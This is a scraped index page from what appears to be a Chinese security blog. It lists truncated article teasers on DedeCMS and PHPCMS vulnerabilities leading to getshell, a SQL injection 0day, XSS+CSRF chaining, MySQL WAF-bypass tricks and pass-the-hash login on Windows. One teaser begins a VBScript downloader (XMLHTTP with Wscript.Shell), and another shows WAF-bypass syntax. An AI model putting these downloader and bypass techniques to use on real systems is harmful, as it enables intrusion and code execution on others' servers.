如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?
11月21日265 views评论cpu
虚拟化
什么是渗透测试
11月21日265 views评论cpu
虚拟化
11月21日265 views评论cpu
虚拟化
dedecms最新版本修改任意管理员漏洞【配图】
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意...
11月21日315 views评论v
漏洞
PHPCMS前台设计缺陷导致任意代码执行
PHPCMS前台设计缺陷导致任意代码执行 作者:felixk3y PHPCMS前台存在严重设计缺陷 利用这个设计缺陷可导致任意代码/命令执行,当然可Getshell. 但PHPCM...
11月21日357 views评论phpcms
代码执行
vbs下载者
一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.O...
11月21日moonsec_com300 views评论post
shell
dedecms利用xss+csrf getshell
最近确实很忙,很久不更新博客了。 dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修...
11月21日527 views评论request
xss
DedeCMS会员中心短消息SQL注射0day漏洞
作者:c4rp3nt3r 主页:http://www.0x50sec.org需要:magic_quotes_gpc = OffDedeCMS会员中心短消息SQL注射漏洞,成功利用此...
11月21日moonsec_com311 views评论select
漏洞
[使用Hash直接登录Windows]简单分析
waf绕过:基于mysql特性的waf绕过技巧小总结
研究过国内外的waf。分享一些 奇淫绝技。 一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql tips1:...
11月21日moonsec_com417 views评论mysql
waf
安全暗月培训服务(代码审计师、漏洞挖掘)
安全培训服务(代码审计师 、漏洞挖掘师 ) 连接 跳转 http://www.moonsec.com/post-224.html
11月21日moonsec_com1,099 views评论代码
漏洞
一次渗透录
棋牌游戏服务器安全解决方案
使用Hash直接登录Windows
首先,在本地主机(假设为目标主机) 新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH
11月21日moonsec_com558 views评论exe
hash
68